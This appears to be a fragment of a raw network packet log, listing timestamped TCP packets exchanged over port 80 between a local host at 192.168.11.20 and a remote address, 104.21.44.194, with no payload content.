                                                                          Nov 29, 2022 09:20:40.733402014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733413935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733424902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733460903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733474970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733494997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733506918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733517885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733520985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733520985 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733521938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733521938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733521938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733530045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733549118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733561039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733572960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733584881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733596087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.733694077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733694077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733694077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733694077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.733860970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.866101980 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.874612093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874726057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874758959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874772072 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874783993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874802113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874814034 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874825954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874839067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874859095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874862909 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.874871016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874897003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874933004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874944925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874968052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874979973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.874990940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875031948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875036001 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875036001 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875045061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875087976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875102997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875123024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875134945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875145912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875168085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875197887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875200987 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875200987 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875200987 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875200987 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875221968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875252962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875283957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875299931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875319958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875332117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875344038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875372887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875370979 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875386000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875397921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875427961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875441074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875452042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875473976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875485897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875497103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875509024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875541925 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875541925 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875541925 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875541925 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875546932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875560045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875586033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875601053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875631094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875653982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875669003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875682116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875683069 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875683069 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.875688076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875699997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875710964 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875734091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875746012 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875756025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875767946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875783920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875796080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875807047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875818014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875842094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875854015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.875854015 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.878930092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.878942966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.878957033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.878987074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.878999949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879018068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879030943 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879043102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879049063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879049063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879049063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879049063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879049063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879049063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879049063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879049063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879055977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879064083 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879064083 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879064083 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879079103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879091978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879103899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879116058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879139900 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879160881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879192114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879206896 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879213095 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879213095 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879213095 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879214048 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879231930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879256964 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879283905 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879295111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879308939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879321098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879333973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879354954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879368067 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879379988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879391909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879404068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879416943 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879429102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879429102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879429102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879429102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879429102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879429102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879429102 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879441023 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879452944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879478931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879503965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879523039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879548073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879559994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879570007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879580975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879590988 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879601955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879612923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879640102 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879641056 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879641056 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879641056 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879641056 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879642010 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879642010 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879642010 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879651070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879662991 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879673958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879686117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879690886 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879690886 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879690886 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879704952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879726887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879746914 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879760981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879771948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879782915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879795074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879806042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879817009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879827976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879839897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879851103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879862070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879863977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879863977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879863977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879863977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879863977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879863977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879863977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879863977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879873991 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879884958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879895926 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879906893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879909039 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879909039 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.879918098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879929066 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879940987 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879951954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879962921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879973888 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879985094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.879996061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880007982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880018950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880029917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880040884 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880053043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880064011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880074978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880080938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880080938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880080938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880080938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880080938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880081892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880085945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880098104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880109072 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880120993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880139112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880153894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880166054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880178928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880191088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880203009 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880215883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880228043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880239964 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880250931 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880250931 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880250931 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880250931 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880251884 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880264997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880276918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880290031 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880306005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880337000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880369902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880386114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880397081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880408049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880419016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880441904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880441904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880441904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880443096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880441904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880441904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880441904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880441904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880441904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880453110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.880460024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880460024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880460024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880460024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880609035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880609035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880609035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.880609035 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.882632971 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882762909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882776022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882816076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882832050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882867098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882915020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882929087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882941961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882961035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882973909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882986069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.882999897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.883018970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.883032084 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.883044004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.883044958 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.883044958 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.883055925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.883074045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.883099079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.883111000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.883122921 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887634039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887651920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887664080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887670994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887670994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887670994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887670994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887676001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887686968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887720108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887739897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887767076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887789011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887809038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887839079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887840033 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887840033 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887840033 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887840033 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887856960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887881041 CET8049852104.21.44.194192.168.11.20
